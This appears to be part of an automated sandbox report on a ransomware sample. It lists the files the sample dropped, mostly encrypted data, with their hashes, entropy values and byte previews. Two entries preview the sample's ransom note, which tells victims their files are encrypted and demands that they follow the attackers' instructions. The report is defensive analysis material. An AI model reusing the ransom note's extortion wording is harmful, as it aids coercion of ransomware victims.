.sU.F_;..^2+......?.....*i...=.[.V.L*#.;.qT...XIT.Lmxh?..n........#.}.E...MA\6..&P..<0X.si/:..2pI.G.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.838317855193871
                            Encrypted:false
                            SSDEEP:24:EaQnu+HLT0LUBscE+IGXJkmzp5bBT/XELdO+IH9WRu1t85wXLYhjnl0lGiQacm/S:7+KUBscEGXJkmDV/XZjd31zXLYll0lhQ
                            MD5:3621470A9BAC6F2F6D58368AC9192B73
                            SHA1:1DFAB6D1D363F880056B5EF128E25C88841E6C92
                            SHA-256:A8CB6568B12240D8872AF8E1045D0450C58B2F015FD102E5D7FFB72ECEDF8226
                            SHA-512:9A4D116ED40C8CE9DFD8AF02B04253F8ACAC43CCAECB8E442333CAEC22FE2D570A711A0781B8DC41881473EAF3D33C5E9FBDF468B992527920F6C41B414E34A2
                            Malicious:false
                            Preview:.,.E..>.Y.C.>.<>.z.6.F.d...F.....+....94V.l....#.9..:.u.. ....Zox.R....A.}..>.P......1....(wH.l.8.t0+-.6.Z..3C{.......w<-*...^.8.i$.y......zMU..5MO.If..S$.pu...P.V.)EZ..?..E.[...Hf.z.I..z..\.4.f)....V6....[..*ih.%m..F1{,Y7..].Ih...wV..Z/.j>..}..e?9bK....Gs.:....4.....E6..3.....m.z;`..@..A."g..j..L..[\.k......`.x.l.s.z......7+.L}.+..+..4{.7.:.Isd.....N..h....n....0....8...b9.$.... >.|../.....a.J.@Uw..-.!X...D....R()...24..x<J.a..Dc....O...o.q~.a.5.).ni|H...).a....s 9.a8.qrT.....z}[.^.!,....M...u.X.R<J.....?...-..T8#.Q.V.fA.0..U.....$....li.........z...xmr./.._...^...K.. ..6vBN..b.&....Y..}U.s2'.5...8..C0.q....j.NY.~.O...>F.j....l...../.O.}...Bgq*.........P......~.V.C...+.9..Ol..)9.0d.P...t...Omu.)`p......c.....t.&....d-.$F. ..;mL.4....P...y;s....6..xG...eI...jP....6..i...a..p.:..... +r........~H..mQ'..XkhXv%.Z..yk[....l3..s...wx.X...vw.s4H..8N:.%....=.3.\...<.,.kW4...%.i2....~D...j.z.Z`...F..YgR.....'a..O......W.mpQX.k.c2..E.8
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.833331083818821
                            Encrypted:false
                            SSDEEP:24:tsGvfYzcNzorBIQ/n7XOZocssLqHG43QikZ0Jtif8fAOS5lGiQacmNm19n4:txJ1uIC7+mYL69cSyEfA9lhQ6Nmv4
                            MD5:D842A251EDD24ED85B4E078201727811
                            SHA1:3DBF96D89800A1B63AB36B95560B3D7D67C5B948
                            SHA-256:FAD7A3C6E61091DB766AB433A0D1DC9D02FB265D4CBEE17FE620C3D9410C94DC
                            SHA-512:C168B94E54C07803384A98429D321C593EEC2FEDDC50008DC50CAEDFDE34D1279347FD8C6F8E0F09FA082A6A090392B50A122535AE3D2DB77BC1ED266B91545E
                            Malicious:false
                            Preview:.W.x.C.!..W...J..v....Wa5.%.?`..w.L..6.,....3.F.58..xx........S.U..?.?>._........G.....K..#.q..84..I..b..-...U.......7.K.....6r...,.V.#7....O..QE.dR.e..'..A.-.j....n.#.q.NL.B...-.:6......,M...d.......Y.81..5b._Fw..).&/"O......X.}...|..D.........u1........>.....1......=?d_..}b.L....!..=..9|O...*l.O..Uw...%.........6.....].].@D.M..F...9.a.o...@{18...u..(.e.@D...h)g.B..%f.x.+..n.z5.2..8...hP..,..e...s.]...c.......1]....7....<...(...Qd..|v...U...Ox.;...I.Z..^.L.f...F|....EH........l...".:....N7.........j#.)..<.d.(V..'v'../...3..GZ.<...@.K.y......xzN..d..v1K.&M...7g..}..t..iE.r....t..0!.&.<.Y..g..t-vK.!>,m..+sP....j>y..ZjXne6.5..'....La?Uy.....`...:.Y.(..rwI.%FW..A....,..B....~....J(4..bD.;.V1.l|..^OY..fj.d.....:'..7..D..v.....B..P..A...e.......h.F......-.....$...._..u.p..9 .....=Ce..N.ee.....7.K....o...5S?....|..e.a*.Zo.......M..[...A(.}.H"UnQS1........S....q9...%..s_..g...+...;.]D[...D.....O`g..... .. .E3....b..Lgs.......FP..y..7O.w.`..(
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.850816611954376
                            Encrypted:false
                            SSDEEP:24:eMTDfH3O4bsgomEPGCp573yLB9+2L/JHLtRCTMNKEe33zEPhqRzQ5lGiQacmxxiM:e+fXOO9j7n+2L/JHLbCTMNKEeQpqR8lR
                            MD5:030197363D1531EFADA258E5DBA6C230
                            SHA1:345AE75D99247561F696319D93FC56BD930A33F8
                            SHA-256:27E0DC0994AABDE116616851315BA2DFD827B5084FFB72A5324E77F795D823E0
                            SHA-512:781F14BD1511FDB18D3556D5255F4F66EB164C58C2B4952C3A5C65F8D1E18524A47B6CB00263BDA1805F79238341FF5A740BE16A498B84263A0259E445E7C0F8
                            Malicious:false
                            Preview:t....Y...uw.`.EwE.(?..)hq>.#.......d...efYX...4...iL.d.*..]...................".@#...-+.I.C_:...C......fW.R..q...i..2.Q.....2.....Z`.M)O4..N.....f-.....}.d.<.S..........|}.T..k.p....\J...s^......Y..Z.+...<.......f..Y.......qwl.k.U.)...E..i..<D...(!c.>..vV~ 9f=!..=.G..:.i.m..y9F.,C..............`<....X.H....C......w.p.......$._...._.2I..|.PlRa.B..n6.Z..ZZ3...w..G>X...>..d..........._..y........O*..(...>c....}......Y...da..).i8.3f.s..J.cS8..ff.M.\fP./..zi...B..G..y....0d.Xw;.oa...:...kg....F.a.W4.`.....`.M..,.E.ED4m.7=....B.P....YZ..12..O."H.'...ex3P9.n.WjCu..........J...pq.........m...M9E.f...C..]..:.j..%.\o.`K.#.):.ekU..P...v.6....&.....U.D....[.-`g.J.N5...N....>.\.Z......K?..i....[.r..T..n0.j&6..tg.a.*b...@G.[j...m.sK...N.8..wi..HS..J@.~I..-w.I"<.....~....cY..[..8l3)t._h.I.."........UX}....z.^..*-....8..Dt..h..k.(.Sph S..d.{..z`=.......P....w.A[....%(@.......O.0.......^:~.~..3.......w$3..d.X$6aN..:.~a...N.c...UJ..."8..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.84089118219381
                            Encrypted:false
                            SSDEEP:24:WDK8aL/JAzc5THdrkfrl3a7xVVn3LMZn7AGpR5mhl1s7ddogHwQPlGiQacmKw:WMyc99rkzlKtVten7A/h4v9PlhQ61
                            MD5:07FD4BC6ED38E1978025088F2ADFF9C7
                            SHA1:01633DE2E45267AE923DF093B57774D8E6760BD5
                            SHA-256:364E0FCB611195B06E0B56D8BF0B00B1D927C3022EE24183CE502E2C82A744B4
                            SHA-512:CAD2A3BC921402A53807555A3C54DB3D9E90F1725A277525449D92DFE1302FC23BC2B472C3D26C716F23DF8BD109ACFF68BD639D61E10C2B38979B0C9EF8489A
                            Malicious:true
                            Preview:..#O z.1...W..f.Y.!....../...3a0..xV...].O.T._...%.h..rs.NRN1W.Tk......F...4.7d.+........Up...#...a...}%.L..|..T..Y.#.4hVBz.U....>W...z.&N%k..[.d..v-[.p${..g.......d.w...Ha_d....<."..7.B>xQ@.g.....L.<\u........m.$.z.X...6.}...F.Z1.oQX..s!.2...5"..,J\4.g.I.....7X........^....d.W...../........K.Q...B....u&..D..."]..@3.E.2......g.s.@..kP|;V......#.{..?.........6...&O<....._=..Z.\.-....=....M..l8.LWg...W.H..o..21X_.....C..uB5.T..............._[Z..K..S..<.?......>.J...}.c.P.%.m.......{.1.c..0..8u=..h.V...7&....<.Z.vT....>....{<.4.....(P|.$..|....I7..M\A..g.9d~.. ;I(...re.s..k85...\.D..-..Q/.Vmx]...!$D....$..(.X....o.....<..@..xE...rZM..z..,^$...W,.n>.V,.......].v.Sb.Z0.ob8.6 x.....)|*VL.c.-%....N...9S...w.Dj.....O...';.......r.9.@...........p.1.>....!....k.......>.^....H......p+.`[.1..W....v?....+.7t...x..._.../4..-.}..=.N.i...+.ZuYSY.>.6..B,.....Y...K..|QS.mH..k=r.:Y.e.Y'...TK..].....B..pS-...? .OaK....... x.HH*+..u.u~..ps.....NeH..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.851088057298517
                            Encrypted:false
                            SSDEEP:24:8Amcx2P0NYiAce0H/s3UU7cCitZNs8MT6CdAMan1HW+oncSBdoKhH7TVGdlGiQaW:a82PW80H/eUWdiJs8I6GFcx4lR7TVGdw
                            MD5:CCCA33118A60DBE18C98028E70BE6A0D
                            SHA1:88406F1D2A38388795C665E14A859045067C05C4
                            SHA-256:0AC92A521590B2A869FB6EF03FD0D6CEE918A571C11B43134072D9AE14A460EC
                            SHA-512:1A2EB9EA8A384453267D4379C5973FD565E62229DA821C07BCA69F4B53BF3A67D2BC386070C4BBB3190D13C2EFD07593927F2BC7DA75FF46F482B0F90362F0B4
                            Malicious:false
                            Preview:......8.u....2...9.p..j.r......s.+.F7........!.....?".]H.....V.,hS..|=`.sg.8~.....W.%u..o...k&fb....Z...lc...U.)......(D..dl-..m.>d.|..7.....#.024......%.}.T.5.....y..sC?.....v.}l..~i.<...C..n....?....$...@.iG.......^k..:..M_.R.[<.....c(G.@s.D].~7....h.....}.IE.Vd{5...>uW.H......C...u.ml4./a....s...&D. t1........HuZN.#.]."Nh.]i.t.....S..'..?..D0..s._....dL...^(9f...2....?}......6..h27.D...K.S....ma'../...(.._O...qE/.T.%..:..'.....Y...;Gj^..|.....0.kc...~zx.7.L....e.fV...f.9W.w....s..n..1?...n1..{.Z..s.v.d.8.....S.HK...Ej.d....cfl..%k..D..2..df.d..Tw.+.q....Tv?,J......\M$.7..........Qd.B*zKT..S..vV.{...."k..G..y.I..6.Ks.Ec....c)..9.I..^*.Q. =W..u.gf...@..W.....cb]=.Y.h...kW..).g.....nX............F._.^'(.3{...7..[-....._~..A.^"..&.....|e..C...`..*x.Rq].`k..no!.n...}.......`y..uv.....'=:.RL.....1...........H..7C.."a..*..v..j...T.{.q(..X.....U...:{.G2R.|..T..+....KbZ....Q.tY.J.K.....IL...Z..".[.r.<..6w._{%.^.sG..bOR...j.4..`D,r...x;..r..20
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.837335588837227
                            Encrypted:false
                            SSDEEP:24:/q3KGAx3ZSpa94olt0FhQlMBTbWFEe3cl0T30gIOeXlGiQacmY:/QjAx3uHolaFWlGTbWFUKj0keXlhQ6Y
                            MD5:CC04C980C69832923722AD9730F82428
                            SHA1:F5AC2CC7D010706967F0CEF2CAC72ABFCFBE5D67
                            SHA-256:07485F47B9EB29189639597EE9549E642E253FE0111AA8F3EF894F7BA9417286
                            SHA-512:D4BE5683B5AC0D789E80620262948DCFCF60C5DDA1DA51DE627EAB5BB3C3818A66BB84948BE3E000FFD29647FCE6D03BA21B25258B17E721FC1AD9C28891B856
                            Malicious:false
                            Preview:....3A.W.G%.......B..r..e....:........u...].....|..}.j.........g..Z.m)s...m........H_...;[n.....'.y.o..Y..bP....v.q....]..Nzl`.fp9..t..G..H...[.......1T....<*..{.O.:.Jw..La.E6..|b...M...hb\.C.0.TR[..|...W...]."..yp.'..........V.9..e.Y.t..w.0.g....z.]..tE.(^..)....'...U..g...q..(..}.#...8X..,.....Iw..6p..!D..CE:.).>..*7.b.).....6.^f...0O..."..R1....u*...E..;u.i......3"...bx\.Q6...s}...3..6.Gc.l.P..K._q>..$...v.SP......\".G*..[.....?.e..Q.....].._kU....O.Kq....@..x._..<.....u...?..5o..r.hVK...[._7B..D..V)a....O.7.<...`....H.......5...^.....6n.......v.[s.........}*.@{.;..1..~/...T;.....x....nd.......<......Q......"....c..[....ia...%.M...M....Pfx*s2........T.f^gl....1T...).........."....;T.f.NF.b.}_%..N.*...).e~...;.....$..:...&.q......../..g\F.*.....QkS...d...! ..e.Q3.@..]O....W./..h..t.8..N.<.T7.Y..o9r...K..A:.".C..v....w....<.5..gH2q.0 ..'H.v]....7.G.:n.7....9V......4...D... ...Q.x..=...).|.`....u1 .)!D.MJ2......hi..\..p8g_i....~.....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.841955348927035
                            Encrypted:false
                            SSDEEP:24:lfvj3e8csl3CKzluo+M0WAi1rC3i8BqTvKtKbUflGiQacmOE7Y:lfvoKzluxaA9i8BySHlhQ6OEU
                            MD5:DF9AA03AB99FDF9238F8F8ACEF91C600
                            SHA1:1A03B14A866A39D8D6DF342AB7EA5B60FF711990
                            SHA-256:875D7DE752F7850CE788F192EF85ECA4D8C2DB7F24FCD1CE0D3E749230841672
                            SHA-512:4C8FE6882F644050168136208DE54662FFDA90F10998BF1F6EE6F1F963066EC9C6AEF35BA9671A24BDCD27B15A08B53DF568B22915FC9C0AAB5AF7C731021E15
                            Malicious:false
                            Preview:p...,,(...T.k...!k.8!....M. ..S.)..{f.n.qR?....g}.(FL.....}.&T.t#.;..N.5......ih$.jz..?.O...e..SR.....*YW.`.A.*..=.8SN.F?.5J..V?...........|<7...y..TV<.O.l.t...Amt.L..5M........(...."m..I..."..t.y.........j{....I....c.I...Dhj=...JW..CQ.m..@l..+.f...I..j...f).L.d...F..'.\...Z..o..]..7...x2.[..(6e.s5@....$..U.....().g..^.O........P@&.<...h.e...W!\.7.Nh..x...M..J......cM.K.x.Yj..*.z.a....I/X+...H.b}Z.#;X..e....m..<...B.zXmk... 7.,2G.\...*.5.7t..(}U..z..Z .2.9..XV...]..iR.....6`E......Ic..a..10&......[c.[V..e^..1...|L.'W.zz..7!.G..W..a.O?.......-v:..l.z.7kUK...........sL..C!.l....N._%.&.u...]t.t.b..T....2.^.......eF...WT4..jSf...AR......]..(..@..w.s&.beY.<V....D.s.R....C..k?.(..C.j....X.'Dv.._....X...........x....Z.VC..M....f.4y_`%....g...B.|V..2e..,;...S.?..Z...`..+...6Q..R..'..Z?.....#F....j..%^..).R.zm.._.u......V....hS.5k.St.NM...]...K.:..{.#:.......l.f3.N.2`...L..T.|i..E.m~.KM. ..Gv.>MxR..E...w....1.....=..W.jw..u.GA.)........jE..e.:
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.830562408954751
                            Encrypted:false
                            SSDEEP:24:FTHazze44s5I6TDgQwnscRTwj8Evhdt1fKvdb3jlnDbFlGiQacmZ/y:FT6zzvp5kQwnsc6h31fK1bzh9lhQ6Z/y
                            MD5:7578EE53762D840C0507368ED9ECFC2B
                            SHA1:D26D15C788A9C1C87EAD84DDB8CB7F93F323BC29
                            SHA-256:1727A7FCB9B8ED2FF74C5A4687E2578D87DC1834C9620744AAD06E7452A96112
                            SHA-512:EC26ABEBAC288A0EAE580680251BB8FEF6E553CA80EB386AAE82A842412A0D872DA145B477310727E5ED871672EC1E43C77FF7F1B09B127FCC2FAB3E82784E58
                            Malicious:false
                            Preview:0+.6.>.gp....S.v6..KXW....#......k2x.~.......u.d^..8n...3..4,..)...l.?4...#*l\.W.........Y.d@uK....3...TCc.WWC|.......\.s'...<...m....G..Hy..2..t............B..Y(:.Pv.U.Ih.G.....G....'..H.'E......4.-X.S.L..u.I.%..w..5..,.[.c.uR.4..jX.+.9X~.z.MB.O.....B...^..b......a.....S...m...(n..co..j..+.b.%.M..C.<.g...0....L.B...b$.;..yo.J.lX.9_[.fVX303....S.w42I.@.+E:....O,.OjN..9.^.....V!$H...V....@S.+..9+;.....~./..X.P_...I1zh...M.h..td.q..E..18RB...z..M.t.(.....}..w!.Af.W,.u....q.+bQ./.?....X..D.........L'.........4!3....mH.'n..fg7.g.&...Y.....\{.yz2y.3.R.4'.o...U......*....%.2}.5.6.....N..oK.eS#"..^.!3..G.%....>.H0L|A..&.......A......f...:.).{(.~j......z#....u|.T...:0.X.f...^n`.....!.v%1..N..;p..B.....0...HpO...8K..`,D..&..<..g.~.H8Y.{z?B..b.....o....T.@e..w.=R..\x..[>..6......I....f..0...m9.v6.....enH.K....#.]O...G.J./.A.o..=.?,x....L..).l..Y......1.1....;`.0.<{.EF|k}.=3P.7.......*........;f......Op?..:K;X....F=. ^V..a.R6..G....s.%.7..1@.X!...`.*.~..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.849341213705592
                            Encrypted:false
                            SSDEEP:24:8zLAJhtRh19PmJ5Ieir2pbXppxif4LmZjeBTny1+3KJCiVU9sUtx4lGiQacmSB:83AFRn9P2IDr2nrif44j6iliz4lhQ6w
                            MD5:5CBBE7D792C6E1F41BEC24B4463B7292
                            SHA1:3073D8227BD8C795CF42CD937BA8BC9633D17841
                            SHA-256:1E87C4DA2469363E45B44301BFD98AC23D0C1F56008E405725FD740B06586B7C
                            SHA-512:091B5A53E33D474FC6ECA8C9523C20FEF6EA131BFCDC67F2D1B3AC1234913C09B4ED3E60CD9B4353604F509B25B6E534EF16465EDDF9891284876259A144C98C
                            Malicious:false
                            Preview:.?.....!.z..K..7..|...Q.....$....E..G...Pn.'..H.@..ow.V5.%..0M.H1\....$.5.....J...h....!J .{...}..t.F..8......... 6[a.R.n.K..Z'^.....,.L.....s...HJp..........p..W.......N".ba.&.Dh.%.%tM..-..G.Z>....c...r$..Uq.5W.io3.........\l..vA.Q......!..........;....).>U.?/]..Q.....|........&.:.....^....r.........Y...&... nx....[&.....Wy...y...HI.(...5.A'/~..9...c.1f.;...2..K~^...J....#.d......m..........&{.%.....^$l. @..y.(.@..'.SA*E'.v..EV.qF..$ic.....,...\.8KO.&9.c..~1.....:.g0..y.....LCl..C.vx.....X.....'AP..sL......!....G.;..y.g....r%..`AX.(J.K.....BR&stH.......vb...Tc.l-...K..V.Lt|...R#......n3..D..`.)H.8..'....-..="-.W....7.....(.i...A.d...;...'.g3J.R...k..d3j......!1\@..U.h.=.....hD......9;I ..9..h... e....h.d.KF..3x;.#k ..:...@....H....>......U. +N.k..F.4....fg...?wLmi.Y.._X.eA.Sz^.x.k..w..#.R...Gj....7...0.m..._ .....(1..........e...Y..q..#.....r...t0....R...:..D^].'&..Y.P....u...e..>..r...@.\..(......+..x.DqRS...R.u..l....Tm.T......
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.838138984270301
                            Encrypted:false
                            SSDEEP:24:8HMOK6kbHjwkDQvQe+B9Yb5gnpuXX6WCLynAoXtgmiB7qyElGiQacmfuEU:oMsiEkDRe+TG5gnAXX/Ao9gmiBQlhQ6k
                            MD5:7A42EF838181579FC2BA0CA6F39E0009
                            SHA1:870D154D149A28D19B31383ECB07AA24121F5DFB
                            SHA-256:3742D5328EEC43022562FBF5E924B563FBB4DA9E181F69D5467EAAB332E67FD7
                            SHA-512:773BDB60B8DD203B4E04C1D633EE044CEF8544CDDC06BF6D8235A87B9A45EC170F5AF3D6DA72AE6798D934FCD2A8C340836BF31EA5B87F1E2F59B3DF667FA175
                            Malicious:false
                            Preview:L......$&U...b.@. ^KXt.[..4..wB...D...0[H.r)..y..zf......Ne.`,./..{..7....K......9.^..40...^...Z0bA'.f0"!.y...:.4Rh......q0a...x...Y..I.X..o.MSdg.QKN.*.........$g-..#].w3.:5..=.M.)H+arL.P.x3.....=.d.a.....xO..,y!.4...ej.1. .O.....Q.})....%.>W:.9..y..5.Z...=,.78N.j....D\....I....T..].). ..o......V..9.U.....G."...c.#..H..|..Q..=.,`...<..q;.U.Zr)...o7Tn.*.m........1.. fL..vP.. e!.......].....I- ..B.].....|.../._.......=...#W.}.[,#...n.V...Z|./....$..y...].p.....:.,?...bm).......e..<.E`7.,.S..mD&.......}u.0.......m/.....{$.)&y...].gy..%5....h.......?.!3.....}..Q.[..>...2|F..9.Y.E.H.OF.n..#|..]...s`.RO../$w.z.s...H.......*Q../t.(<.].~i.e$./z.JF....G....t.V.8K..:......}n...vy....,..D.....=k'....Q.?.{...d..^9.......i...'.C"....j.f.$.... ..]z..A..+:#.1.GJqf...u..e.V..s........{...2`5..`.M...E.#.&@..p.+.3.'7..Fv`.8s.er..#.V>.F9..FF..X.J.@,~......../..>.t....b.^..@.f..o..S.r]...u.E.5..r....?9s.Q.*....X.t.....u[.].....~..N<a.......c.|.t..c2kh4...
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.852090646749837
                            Encrypted:false
                            SSDEEP:24:YR5zwSMohhdW76xOSz8YS7hkPCIxvEHrtrLa5AwgqGTiiylGiQacmGTkh:YRySMoh7a6xOStSaP5xGBa6wgqhlhQ6p
                            MD5:BF4CC2A21E58C923C99B3E5AE5C75DA1
                            SHA1:9915B8458CDB0C69EA53F85FBA4C52EBE52BE3DB
                            SHA-256:98C322DF628BD280723312F1D4166C16EDAC47E114F2F082BAE995D0F2A385C0
                            SHA-512:4C175CCAA469B97589FC5E2033F83033BA21E297D215F2D74E2D55BA5D03450D32C61563FD4DC65B2BFA64868882DE5107AD40ACA000D84284206030A526B702
                            Malicious:false
                            Preview:X..1.....pmn.v...f..`uC:..K..+.......~..........().e+?..]q>....H.M/....Rh:....B\..2...}.....VZ.v\..mZ.s..{..w........A........I$.|.....?. ."".~w.V...I..Rn..=..p.5......KY..s.O2O&j....9n.`..\...>%X..Nr....y.S.~3H............e.S.F@.9D. ~.xB....CN.w.(Z.H.f:..a6..[8.....k.aN.N..%.+..O.m%..46.pV|s...../..........3...."U@.I...O.*Iy.c,..U..%u.Q.=..r...[...k.&:........7q...L..TChK..QRlc....:V..{p....q.#.F..@.q...wX.w.E.....:v.GwZ..._.wk..9.Z[9*A.#.......:...%O.t..^! z!...x.....D{."l.%va,.@;#B.\.Rmw..gwa7.....>..O.I.1...4...l.._0.......kg....9;.~....j.mS.H.........yx.........r.Wx[.......M..[.......L...r...V....{..Q...o....8t+|...-.Y....k..?e.Q..~.~..[..\....z.6.....Q.4\. .v.E..^..k.mB..>R..H.;D.9../..\TZ......[...Z.r.x.(.Ck.w.....3..9..........a..W.'.-$WL..(.nL"$nR.<....KxFM....=.....0KNh.....{./4....v...Rk7...H..]....JX...|X.........2._b\U.....$^.w.s..<H.mz.....G...Fm=.?RQ.......z.'.Qs\...u:...N....*...rI..&.#..,.V.*4.....5;....[a..&T...8-n.(..(wK.4
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.846004397840962
                            Encrypted:false
                            SSDEEP:24:HgfLb3yQuORMzBiPyoO4NaRG+MaVOFnfXqY2TANot16VLulGiQacmC5C:HgzWgucdOx0+JOFnfXJkCo6SlhQ6CY
                            MD5:64A8E55EC1AE513F3A0F9B7F751E68C7
                            SHA1:C950BA0CCC76FE1FE0DA569E8795F9971AF469ED
                            SHA-256:3A21210AD12C4DA86061EA630E4B379DEEC271FF0A9A07E2A6233A4DABE3E6DD
                            SHA-512:AA5F3A6DE64E5E386FC7534CD2D67D00C34F4F64FE821D843D997A3B5A8D2E5D322D4C8C30CA7D539823626DB726A224B970C2CAF8D27DDEDB1C24DFA14AF04B
                            Malicious:true
                            Preview:H.._.-.....}..b.B#.....(D..E.T..l...>l.1..P..&..<.\2...2kn..g...(.hZ`8Q.)..(c.x..ej..2....Hm...iV.....|...5..q#c......s.. .F...h.D....'.S0.N...af..5:.....H..p.[~.uZE.X'..m.@..R.....6j..Bn.bxPE.E.&..Ork.z..PS..IKQ......y.b...,..It......,5.k.....a.}.".}v!..f..@X#......:5U4...xaU.Y.......r.=..P ..y.=V.......z...7.=.MH_./.9...,.x..3.8...+.q ..?...Q..k..a.`R...J.V.F+K..>....t.8...J.'C.c.AL.H.6.....0V..Z.......^.@.....W....I.t..]=......}e.o.DV.?.a..^S:....).wP.....GcCElE[`.v...x..EOo..s.!/.O....y..}.ua....`..ko..$M...E8.....#.D.H..Q.Q..Q..-O.%B...V..Xlh)......@..{..z&O...d...........#R..j]...e...%....k.....r&..gb.Y.N%...L....mjf..~............vT.....]h..z..?E.7*9.ye`.%.D.s..L].)......./..X..x.qL<..Q...328...5#.H...m.$.8y...6#.~..F..9..gBk....7...TTB..i."E..o..k.@.....7..1;..Y|....0.....Qy${..l.....<X....@.G|...P..1T.....?..5......R..c.3.....#..8..(...i,.G"...w....M...M._Z.1.9.t.).....d......)Hi9...4.2.5.q.z9.G...g..Ep.CBO...Vk.O!..2..c[
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. 